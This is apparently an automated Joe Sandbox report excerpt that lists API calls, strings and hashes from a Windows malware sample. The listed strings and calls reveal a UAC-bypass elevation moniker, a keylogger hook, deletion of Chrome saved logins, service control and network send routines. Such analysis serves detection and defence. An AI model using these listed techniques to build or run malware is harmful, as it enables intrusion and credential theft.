                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-3166923314
                                                                                • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                • GetLastError.KERNEL32 ref: 00419935
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: 88145660ca74307e410d2ff44a9f08576091a861de2da63eb11456bd5a492770
                                                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                • Opcode Fuzzy Hash: 88145660ca74307e410d2ff44a9f08576091a861de2da63eb11456bd5a492770
                                                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 00799B3F
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00799B8E
                                                                                • GetLastError.KERNEL32 ref: 00799B9C
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00799BD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                • Instruction ID: 415c0b2071191571d804af2e0e9c5688433af93a0a054071e8813174b9940573
                                                                                • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                • Instruction Fuzzy Hash: 32814D71148344EFC714FB20D89AEAFB7A8FF94705F50482DF59242192EF78AA05CB96
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                • String ID:
                                                                                • API String ID: 2341273852-0
                                                                                • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0079B6F0
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0079B722
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0079B790
                                                                                • DeleteFileW.KERNEL32(?), ref: 0079B79D
                                                                                  • Part of subcall function 0079B696: RemoveDirectoryW.KERNEL32(?), ref: 0079B773
                                                                                • FindClose.KERNEL32(00000000), ref: 0079B7C8
                                                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 0079B7CF
                                                                                • GetLastError.KERNEL32 ref: 0079B7D7
                                                                                • FindClose.KERNEL32(00000000), ref: 0079B7EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: File$Find$CreateFirstNext
                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00465F1C), ref: 0078B61B
                                                                                • FindClose.KERNEL32(00000000), ref: 0078B635
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0078B758
                                                                                • FindClose.KERNEL32(00000000), ref: 0078B77E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00799126
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                • API ID: File$CreateFindFirst
                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                APIs
                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                Strings
                                                                                • UserProfile, xrefs: 0040B227
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: DeleteErrorFileLast
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                • GetLastError.KERNEL32 ref: 00416B02
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: __floor_pentium4
                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 276877138-0
                                                                                APIs
                                                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                • API String ID: 1589313981-1420736420
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                • GetACP.KERNEL32 ref: 004512BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 007D14E3
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 007D150C
                                                                                • GetACP.KERNEL32 ref: 007D1521
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00789013
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0078908B
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007890B4
                                                                                • FindClose.KERNEL32(?), ref: 007890CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID:
                                                                                • API String ID: 745075371-0
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C7185
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • GetUserDefaultLCID.KERNEL32 ref: 007D172A
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 007D1785
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 007D1794
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 007D17DC
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 007D17FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                • String ID:
                                                                                • API String ID: 745075371-0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00787CF8
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787DB1
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787DD5
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00787EDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 1157919129-0
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00796D2B
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00796D32
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 00796D44
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00796D63
                                                                                • GetLastError.KERNEL32 ref: 00796D69
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
